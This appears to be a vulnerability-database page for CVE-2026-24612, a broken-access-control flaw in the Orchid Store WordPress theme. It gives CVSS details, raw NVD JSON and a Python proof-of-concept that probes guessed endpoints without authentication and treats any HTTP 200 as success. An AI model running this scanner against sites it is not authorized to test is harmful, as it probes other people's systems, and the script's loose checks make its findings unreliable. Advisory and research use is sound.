Security Vulnerability Report
中文
CVE-2026-24612 CVSS 5.3 MEDIUM

CVE-2026-24612

Published: 2026-01-23 15:16:20
Last Modified: 2026-04-28 15:16:19

Description

Missing Authorization vulnerability in themebeez Orchid Store orchid-store allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Orchid Store: from n/a through <= 1.5.15.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Orchid Store Theme <= 1.5.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-24612 PoC - Orchid Store Authorization Bypass # Target: WordPress site with Orchid Store theme <= 1.5.15 # Note: This PoC demonstrates the authorization bypass vulnerability import requests import sys def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2026-24612 This checks for missing authorization in Orchid Store theme """ # Common Orchid Store theme options endpoint # The vulnerability allows unauthorized access to theme settings vulnerable_endpoints = [ '/wp-json/orchid-store/v1/options', '/wp-json/orchid-store/v1/settings', '/wp-admin/admin-ajax.php', '/wp-json/wp/v2/settings' ] print(f"[*] Testing target: {target_url}") print(f"[*] Vulnerability: Missing Authorization in Orchid Store <= 1.5.15") for endpoint in vulnerable_endpoints: url = target_url.rstrip('/') + endpoint # Try to access without authentication headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Content-Type': 'application/json' } try: response = requests.get(url, headers=headers, timeout=10) # Check if we can access settings without auth if response.status_code == 200: print(f"[+] Potential vulnerability found at: {url}") print(f"[+] Status: {response.status_code}") print(f"[+] Response preview: {response.text[:200]}") return True elif response.status_code == 401 or response.status_code == 403: print(f"[-] Endpoint {endpoint} requires authentication") except requests.RequestException as e: print(f"[!] Error testing {endpoint}: {e}") print("[*] Manual verification recommended") print("[*] Check Patchstack database for detailed exploitation steps") return False if __name__ == "__main__": if len(sys.argv) > 1: target = sys.argv[1] check_vulnerability(target) else: print("Usage: python cve-2026-24612-poc.py <target_url>") print("Example: python cve-2026-24612-poc.py http://example.com")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24612", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:19.997", "lastModified": "2026-04-28T15:16:19.380", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in themebeez Orchid Store orchid-store allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Orchid Store: from n/a through <= 1.5.15."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en themebeez Orchid Store orchid-store permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Orchid Store: desde n/a hasta &lt;= 1.5.15."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/orchid-store/vulnerability/wordpress-orchid-store-theme-1-5-15-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}